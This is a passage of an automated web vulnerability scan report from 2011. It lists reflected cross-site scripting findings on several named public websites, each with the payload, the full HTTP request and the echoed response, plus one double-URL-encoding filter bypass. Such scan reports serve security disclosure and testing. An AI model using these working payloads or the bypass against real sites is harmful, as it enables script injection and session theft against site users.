Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=2a3c686927d5809dba33b96974e73b08; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 35636

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<title>Gabbr.com: Submit48e8d</title><script>alert(1)</script>c3a4c354593</title>
...[SNIP]...

4.107. http://www.gametrailers.com/remote_wrap.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gametrailers.com
Path:   /remote_wrap.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 217ce%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e9c0af3ddee0 was submitted in the REST URL parameter 1. This input was echoed as 217ce"><img src=a onerror=alert(1)>9c0af3ddee0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /remote_wrap.php217ce%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e9c0af3ddee0 HTTP/1.1
Host: www.gametrailers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.63 (Unix) PHP/5.3.2
X-Powered-By: PHP/5.3.2
Pragma: akamai-x-cache-on
Accept-ESI: 1.0
X-GT-Cache-Key: s=_404_php,r=_remote_wrap_php217ce_22_3e_3cimg_20src_3da_20onerror_3dalert_281_29_3e9c0af3ddee0,key=remote_wrap.php217ce%22%3e%3cimg%20src%3da%20onerror%3dalert%281%29%3e9c0af3ddee0
Content-Type: text/html
Cache-Control: max-age=1200
Date: Sun, 17 Apr 2011 14:15:10 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ak-mobile-detected=no; expires=Sun, 17-Apr-2011 20:15:10 GMT; path=/
Vary: User-Agent
Content-Length: 34633

<!DOCTYPE html public "-//w3c//dtd html 4.01 transitional//en"
"http://www.w3.org/tr/html4/loose.dtd">
   <html>

<head>
   <title>404 - Video Game Trailers for Wii, PSP, Xbox, PS3 & More | Upcoming
...[SNIP]...
<script type="text/javascript" src="/ui/php/inc.php?uri=/remote_wrap.php217ce"><img src=a onerror=alert(1)>9c0af3ddee0">
...[SNIP]...

4.108. http://www.gillmanauto.com/smartbrowse/ajax/used.htm [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gillmanauto.com
Path:   /smartbrowse/ajax/used.htm

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as text between NOSCRIPT tags. The payload 3025a</noscript><script>alert(1)</script>81d6fe8ab38 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /smartbrowse3025a</noscript><script>alert(1)</script>81d6fe8ab38/ajax/used.htm?detect=false&reset=InventoryListing&showYear=true&showMake=true&showModel=true&showAllModels=false&showTrim=true&showBodyStyle=true&showMileage=false&showPrice=true&showLocation=false&showHighywayMpgs=false HTTP/1.1
Host: www.gillmanauto.com
Proxy-Connection: keep-alive
Referer: http://www.gillmanauto.com/index.htm
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=63e942630a0a0043011b315cea80c7c3; JSESSIONID=h1refb1rpn7nt; lbpoolmember=1728122378.40475.0000; ddcpoolid=CmsPoolA; __utmz=1.1303051319.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/41; __utma=1.1275321047.1303051319.1303051319.1303051319.1; __utmc=1; __utmb=1.2.10.1303051319

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:42:43 GMT
Server: Jetty/5.1.1 (Linux/2.6.18-128.7.1.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 13660

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms26.dealer.ddc p7070 -->

   <title>Gillman Acura, Honda, Nissan, Mitsubishi, Chevrolet, Subaru, Chrysler, Jeep, Dodge, GMC,
...[SNIP]...
</script>1fec5e9f872&amp;20=www.gillmanauto.com&amp;21=/smartbrowse3025a</noscript><script>alert(1)</script>81d6fe8ab38/ajax/used.htm&amp;50=63e942630a0a0043011b315cea80c7c3&amp;51=&amp;52=&amp;53=&amp;54=en_US&amp;55=173.193.214.243&amp;56=&amp;60=&amp;61=&amp;64=&amp;58=&amp;59=&amp;80=&amp;81=&amp;82=&amp;83=&amp;62
...[SNIP]...

4.109. http://www.gillmanauto.com/smartbrowse/ajax/used.htm [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gillmanauto.com
Path:   /smartbrowse/ajax/used.htm

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between NOSCRIPT tags. The payload aaedb</noscript><script>alert(1)</script>2cfa6db0fd6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /smartbrowse/ajaxaaedb</noscript><script>alert(1)</script>2cfa6db0fd6/used.htm?detect=false&reset=InventoryListing&showYear=true&showMake=true&showModel=true&showAllModels=false&showTrim=true&showBodyStyle=true&showMileage=false&showPrice=true&showLocation=false&showHighywayMpgs=false HTTP/1.1
Host: www.gillmanauto.com
Proxy-Connection: keep-alive
Referer: http://www.gillmanauto.com/index.htm
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=63e942630a0a0043011b315cea80c7c3; JSESSIONID=h1refb1rpn7nt; lbpoolmember=1728122378.40475.0000; ddcpoolid=CmsPoolA; __utmz=1.1303051319.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/41; __utma=1.1275321047.1303051319.1303051319.1303051319.1; __utmc=1; __utmb=1.2.10.1303051319

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:42:44 GMT
Server: Jetty/5.1.1 (Linux/2.6.18-128.7.1.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 13660

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms26.dealer.ddc p7070 -->

   <title>Gillman Acura, Honda, Nissan, Mitsubishi, Chevrolet, Subaru, Chrysler, Jeep, Dodge, GMC,
...[SNIP]...
</script>1fec5e9f872&amp;20=www.gillmanauto.com&amp;21=/smartbrowse/ajaxaaedb</noscript><script>alert(1)</script>2cfa6db0fd6/used.htm&amp;50=63e942630a0a0043011b315cea80c7c3&amp;51=&amp;52=&amp;53=&amp;54=en_US&amp;55=173.193.214.243&amp;56=&amp;60=&amp;61=&amp;64=&amp;58=&amp;59=&amp;80=&amp;81=&amp;82=&amp;83=&amp;62-0=10
...[SNIP]...

4.110. http://www.haber.gen.tr/edit [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.haber.gen.tr
Path:   /edit

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac7fd"><script>alert(1)</script>0550415377b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /editac7fd"><script>alert(1)</script>0550415377b HTTP/1.1
Host: www.haber.gen.tr
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 13:52:27 GMT
Server: Apache/2.2.9 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=f13320fbf75a3c23016d2ee5bddaf39d; path=/; domain=.haber.gen.tr
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 63739


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>    
...[SNIP]...
<input name="redirect" id="redirect" value="/editac7fd"><script>alert(1)</script>0550415377b" type="hidden" />
...[SNIP]...

4.111. http://www.haber.gen.tr/images/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.haber.gen.tr
Path:   /images/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 255cd"><script>alert(1)</script>7d1b8b1193c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images255cd"><script>alert(1)</script>7d1b8b1193c/favicon.ico HTTP/1.1
Host: www.haber.gen.tr
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=4a1ddd09525ee6455484044f598c30bf; __utmb=54855858; __utmc=54855858; __utma=54855858.1891209206.1303050928.1303050928.1303050928.1; __utmz=54855858.1303050964.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/40|utmcmd=referral; OAID=15e51418fc85ab980a8e7cfcb9a92c51

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:13:58 GMT
Server: Apache/2.2.9 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 63767


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>    
...[SNIP]...
<input name="redirect" id="redirect" value="/images255cd"><script>alert(1)</script>7d1b8b1193c/favicon.ico" type="hidden" />
...[SNIP]...

4.112. http://www.haber.gen.tr/images/favicon.ico [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.haber.gen.tr
Path:   /images/favicon.ico

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8f07"><script>alert(1)</script>a5748c90cb8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/favicon.icoa8f07"><script>alert(1)</script>a5748c90cb8 HTTP/1.1
Host: www.haber.gen.tr
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=4a1ddd09525ee6455484044f598c30bf; __utmb=54855858; __utmc=54855858; __utma=54855858.1891209206.1303050928.1303050928.1303050928.1; __utmz=54855858.1303050964.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/40|utmcmd=referral; OAID=15e51418fc85ab980a8e7cfcb9a92c51

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:14:07 GMT
Server: Apache/2.2.9 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 63767


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>    
...[SNIP]...
<input name="redirect" id="redirect" value="/images/favicon.icoa8f07"><script>alert(1)</script>a5748c90cb8" type="hidden" />
...[SNIP]...

4.113. http://www.haber.gen.tr/openx/www/delivery/ajs.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.haber.gen.tr
Path:   /openx/www/delivery/ajs.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7ab3"><script>alert(1)</script>471d70f85ea was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /openxb7ab3"><script>alert(1)</script>471d70f85ea/www/delivery/ajs.php?zoneid=3&cb=68239046679&loc=http%3A//www.haber.gen.tr/editac7fd%2522%253E%253Cscript%253Ealert%28%2522IDIOT%2522%29%253C/script%253E0550415377b&referer=http%3A//burp/show/40 HTTP/1.1
Host: www.haber.gen.tr
Proxy-Connection: keep-alive
Referer: http://www.haber.gen.tr/editac7fd%22%3E%3Cscript%3Ealert(%22IDIOT%22)%3C/script%3E0550415377b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=4a1ddd09525ee6455484044f598c30bf

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:13:57 GMT
Server: Apache/2.2.9 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 64131


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>    
...[SNIP]...
<input name="redirect" id="redirect" value="/openxb7ab3"><script>alert(1)</script>471d70f85ea/www/delivery/ajs.php?zoneid=3&cb=68239046679&loc=http%3A//www.haber.gen.tr/editac7fd%2522%253E%253Cscript%253Ealert%28%2522IDIOT%2522%29%253C/script%253E0550415377b&referer=http%3A//burp/show/40" type
...[SNIP]...

4.114. http://www.haber.gen.tr/openx/www/delivery/ajs.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.haber.gen.tr
Path:   /openx/www/delivery/ajs.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5dd78"><script>alert(1)</script>5b16b6a2009 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /openx/www5dd78"><script>alert(1)</script>5b16b6a2009/delivery/ajs.php?zoneid=3&cb=68239046679&loc=http%3A//www.haber.gen.tr/editac7fd%2522%253E%253Cscript%253Ealert%28%2522IDIOT%2522%29%253C/script%253E0550415377b&referer=http%3A//burp/show/40 HTTP/1.1
Host: www.haber.gen.tr
Proxy-Connection: keep-alive
Referer: http://www.haber.gen.tr/editac7fd%22%3E%3Cscript%3Ealert(%22IDIOT%22)%3C/script%3E0550415377b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=4a1ddd09525ee6455484044f598c30bf

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:14:02 GMT
Server: Apache/2.2.9 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 64131


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>    
...[SNIP]...
<input name="redirect" id="redirect" value="/openx/www5dd78"><script>alert(1)</script>5b16b6a2009/delivery/ajs.php?zoneid=3&cb=68239046679&loc=http%3A//www.haber.gen.tr/editac7fd%2522%253E%253Cscript%253Ealert%28%2522IDIOT%2522%29%253C/script%253E0550415377b&referer=http%3A//burp/show/40" type="hi
...[SNIP]...

4.115. http://www.haber.gen.tr/openx/www/delivery/ajs.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.haber.gen.tr
Path:   /openx/www/delivery/ajs.php

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee416"><script>alert(1)</script>a1aafb63781 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /openx/www/deliveryee416"><script>alert(1)</script>a1aafb63781/ajs.php?zoneid=3&cb=68239046679&loc=http%3A//www.haber.gen.tr/editac7fd%2522%253E%253Cscript%253Ealert%28%2522IDIOT%2522%29%253C/script%253E0550415377b&referer=http%3A//burp/show/40 HTTP/1.1
Host: www.haber.gen.tr
Proxy-Connection: keep-alive
Referer: http://www.haber.gen.tr/editac7fd%22%3E%3Cscript%3Ealert(%22IDIOT%22)%3C/script%3E0550415377b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=4a1ddd09525ee6455484044f598c30bf

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:14:12 GMT
Server: Apache/2.2.9 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 64129


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>    
...[SNIP]...
<input name="redirect" id="redirect" value="/openx/www/deliveryee416"><script>alert(1)</script>a1aafb63781/ajs.php?zoneid=3&cb=68239046679&loc=http%3A//www.haber.gen.tr/editac7fd%2522%253E%253Cscript%253Ealert%28%2522IDIOT%2522%29%253C/script%253E0550415377b&referer=http%3A//burp/show/40" type="hidden" />
...[SNIP]...

4.116. http://www.haber.gen.tr/openx/www/delivery/ajs.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.haber.gen.tr
Path:   /openx/www/delivery/ajs.php

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94d3b"><script>alert(1)</script>df421e28eab was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /openx/www/delivery/ajs.php94d3b"><script>alert(1)</script>df421e28eab?zoneid=3&cb=68239046679&loc=http%3A//www.haber.gen.tr/editac7fd%2522%253E%253Cscript%253Ealert%28%2522IDIOT%2522%29%253C/script%253E0550415377b&referer=http%3A//burp/show/40 HTTP/1.1
Host: www.haber.gen.tr
Proxy-Connection: keep-alive
Referer: http://www.haber.gen.tr/editac7fd%22%3E%3Cscript%3Ealert(%22IDIOT%22)%3C/script%3E0550415377b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=4a1ddd09525ee6455484044f598c30bf

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:14:16 GMT
Server: Apache/2.2.9 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 64131


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>    
...[SNIP]...
<input name="redirect" id="redirect" value="/openx/www/delivery/ajs.php94d3b"><script>alert(1)</script>df421e28eab?zoneid=3&cb=68239046679&loc=http%3A//www.haber.gen.tr/editac7fd%2522%253E%253Cscript%253Ealert%28%2522IDIOT%2522%29%253C/script%253E0550415377b&referer=http%3A//burp/show/40" type="hidden" />
...[SNIP]...

4.117. http://www.haber.gen.tr/openx/www/delivery/lg.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.haber.gen.tr
Path:   /openx/www/delivery/lg.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f51e2"><script>alert(1)</script>c2c4fe2a9a2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /openxf51e2"><script>alert(1)</script>c2c4fe2a9a2/www/delivery/lg.php?bannerid=305&campaignid=1&zoneid=3&loc=http%3A%2F%2Fwww.haber.gen.tr%2Feditac7fd%2522%253E%253Cscript%253Ealert%28%2522IDIOT%2522%29%253C%2Fscript%253E0550415377b&referer=http%3A%2F%2Fburp%2Fshow%2F40&cb=592dc5eebc HTTP/1.1
Host: www.haber.gen.tr
Proxy-Connection: keep-alive
Referer: http://www.haber.gen.tr/editac7fd%22%3E%3Cscript%3Ealert(%22IDIOT%22)%3C/script%3E0550415377b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=4a1ddd09525ee6455484044f598c30bf; OAID=15e51418fc85ab980a8e7cfcb9a92c51

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:13:29 GMT
Server: Apache/2.2.9 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 64211


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>    
...[SNIP]...
<input name="redirect" id="redirect" value="/openxf51e2"><script>alert(1)</script>c2c4fe2a9a2/www/delivery/lg.php?bannerid=305&campaignid=1&zoneid=3&loc=http%3A%2F%2Fwww.haber.gen.tr%2Feditac7fd%2522%253E%253Cscript%253Ealert%28%2522IDIOT%2522%29%253C%2Fscript%253E0550415377b&referer=http%3A%2
...[SNIP]...

4.118. http://www.haber.gen.tr/openx/www/delivery/lg.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.haber.gen.tr
Path:   /openx/www/delivery/lg.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28677"><script>alert(1)</script>d4080b8fe97 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /openx/www28677"><script>alert(1)</script>d4080b8fe97/delivery/lg.php?bannerid=305&campaignid=1&zoneid=3&loc=http%3A%2F%2Fwww.haber.gen.tr%2Feditac7fd%2522%253E%253Cscript%253Ealert%28%2522IDIOT%2522%29%253C%2Fscript%253E0550415377b&referer=http%3A%2F%2Fburp%2Fshow%2F40&cb=592dc5eebc HTTP/1.1
Host: www.haber.gen.tr
Proxy-Connection: keep-alive
Referer: http://www.haber.gen.tr/editac7fd%22%3E%3Cscript%3Ealert(%22IDIOT%22)%3C/script%3E0550415377b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=4a1ddd09525ee6455484044f598c30bf; OAID=15e51418fc85ab980a8e7cfcb9a92c51

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:13:33 GMT
Server: Apache/2.2.9 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 64211


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>    
...[SNIP]...
<input name="redirect" id="redirect" value="/openx/www28677"><script>alert(1)</script>d4080b8fe97/delivery/lg.php?bannerid=305&campaignid=1&zoneid=3&loc=http%3A%2F%2Fwww.haber.gen.tr%2Feditac7fd%2522%253E%253Cscript%253Ealert%28%2522IDIOT%2522%29%253C%2Fscript%253E0550415377b&referer=http%3A%2F%2F
...[SNIP]...

4.119. http://www.haber.gen.tr/openx/www/delivery/lg.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.haber.gen.tr
Path:   /openx/www/delivery/lg.php

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3cdf2"><script>alert(1)</script>cdc8a4f2b76 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /openx/www/delivery3cdf2"><script>alert(1)</script>cdc8a4f2b76/lg.php?bannerid=305&campaignid=1&zoneid=3&loc=http%3A%2F%2Fwww.haber.gen.tr%2Feditac7fd%2522%253E%253Cscript%253Ealert%28%2522IDIOT%2522%29%253C%2Fscript%253E0550415377b&referer=http%3A%2F%2Fburp%2Fshow%2F40&cb=592dc5eebc HTTP/1.1
Host: www.haber.gen.tr
Proxy-Connection: keep-alive
